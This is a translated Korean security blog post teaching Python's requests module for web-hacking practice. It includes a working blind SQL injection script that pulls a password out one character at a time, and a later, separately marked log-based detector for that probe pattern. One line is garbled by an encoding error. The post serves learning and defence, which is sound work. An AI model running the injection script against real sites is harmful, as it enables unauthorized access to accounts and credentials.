🔐 Security

[Web Hacking/Python] How to Use the requests Module

Rosieblue 2023. 9. 24. 17:09

The requests module

When solving web hacking challenges, I have so far used Burp Suite whenever I needed to send repeated requests, but I learned that Python's requests module can give good results as well.

I think it would be good to mix the two, so I am going to get familiar with the requests module too.

 

 

With the requests module you can send GET requests, POST requests and so on (other methods are possible too, of course!)

First, let's look at the code for sending a GET request.

Sending it as c = requests.get(url, headers=..., params=...) issues a GET request!

The return value c holds the response, so information about the response is available as c.raw, c.status_code, and so on.

 

import requests

# Request URL setting
url="https://dreamhack.io/" # I picked the dreamhack page as the easiest one to try.

# Request cookie value setting
cookie={'Cookie':'SESSID=SESSION_DATA'}

# GET request
r=requests.get(url,headers=cookie) # the cookie is sent as a header!!

# POST request
# POST also needs the data argument (a dictionary)!
r=requests.post(url,data={
    "param1":"p1",
    "param2":"p2"
}, headers=cookie)

 

 

์‘๋‹ต๊ฐ’์„ ํ™•์ธํ•ด๋ณด์ž. ์ด๋Š” request.๋ฉ”์†Œ๋“œ(~)์˜ ๋ฆฌํ„ด ๊ฐ’์ด๋ผ๊ณ  ํ–ˆ๋‹ค!

# Print URL Data
>>> print (r.url)
https://testurl.com?Param1=value&Param2=value

# Print Content Text
>>> r.text
<!DOCTYPE html>
<head> Test Url </head>
...

# Print Content 
>>> r.content
b'<!DOCTYPE html>\n<html lang="ko">\n<head>\n    <meta http-equiv="Content-Type" cotent= '
...

# Print Raw Content
>>> r.raw
<urllib3.response.HTTPResponse object at 0x000001EEFE821750>

# Print Status Code
>>> r.status_code
200

# Print Response Headers
>>> r.headers
{'Date': 'Mon, 13 Jun 2022 09:51:53 GMT' ...

# Print Response Content-Type
>>> r.headers['Content-Type']
>>> r.headers.get('content-type')
'application/json'

 

 

Blind SQL Injection attack script

e.g. password length: 20 characters, password characters: ASCII codes

import requests
# Blind SQL Injection attack script
# e.g. password length: 20 characters, password characters: ASCII codes

url="~.com"
params={
    "uid":"",
    "upw":""
}

query="' and ascii(substr(upw,{idx},1))={val}--"

password=''

for i in range(1,21):
    for val in range(32,127):
        params["uid"]=query.format(idx=i,val=val)
        c=requests.get(url,params=params)
        print(c.url)
        
        # If the response contains the string Login Success, append the character to password.
        # str.find() returns -1 (truthy) when the string is absent, so test membership instead.
        if "Login Success" in c.text:
            password+=chr(val)
            break
        
print(f"Password is {password}")

Well, roughly.. it seems to be done this way
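Seen from the defending side, the script above leaves a recognisable trail in a web server's access log: one client sending many requests whose uid parameter carries ascii(substr(upw,idx,1))=val with changing idx and val. The following is an added example, not code from the original post; the log format, paths and IP addresses are constructed, and the function names are hypothetical.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Probe shape used by the script above: ascii(substr(<column>,<idx>,1))=<val>
PROBE = re.compile(
    r"ascii\s*\(\s*substr\s*\(\s*\w+\s*,\s*(\d+)\s*,\s*1\s*\)\s*\)\s*=\s*(\d+)", re.I)

# Constructed sample log lines: "<client ip> <method> <request target>"
SAMPLE_LOG = """\
10.0.0.5 GET /login?uid=%27+and+ascii%28substr%28upw%2C1%2C1%29%29%3D32--&upw=
10.0.0.5 GET /login?uid=%27+and+ascii%28substr%28upw%2C1%2C1%29%29%3D33--&upw=
10.0.0.5 GET /login?uid=%27+and+ascii%28substr%28upw%2C1%2C1%29%29%3D34--&upw=
10.0.0.5 GET /login?uid=%27+and+ascii%28substr%28upw%2C2%2C1%29%29%3D32--&upw=
10.0.0.9 GET /login?uid=alice&upw=hunter2
10.0.0.7 GET /search?q=ascii+table+substr+example
"""

def find_probes(log_text):
    """Return {client: [(param, idx, val), ...]} for requests carrying the probe."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        parts = line.split(maxsplit=2)
        if len(parts) != 3:
            continue  # skip malformed lines
        client, _method, target = parts
        # parse_qs URL-decodes the values, so %28 and + are matched in decoded form
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for name, values in query.items():
            for value in values:
                m = PROBE.search(value)
                if m:
                    hits[client].append((name, int(m.group(1)), int(m.group(2))))
    return dict(hits)

def enumerating_clients(hits, min_distinct=3):
    """Clients that tried several distinct (idx, val) pairs: a character-by-character sweep."""
    return sorted(c for c, probes in hits.items()
                  if len({(i, v) for _, i, v in probes}) >= min_distinct)

if __name__ == "__main__":
    hits = find_probes(SAMPLE_LOG)
    for client in enumerating_clients(hits):
        print(client, len(hits[client]), "probe requests")
```

Matching on the decoded parameter value rather than the raw log line keeps the rule from missing percent-encoded probes, and the distinct-pair threshold separates a sweep from a single stray hit.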

 

 

 

 

The documentation below covers this in more detail!

Requests: HTTP for Humans™ — Requests 2.31.0 documentation (python-requests.org)

 


 

References

Python Requests Library (tistory.com)

ServerSide: SQL Injection | Dreamhack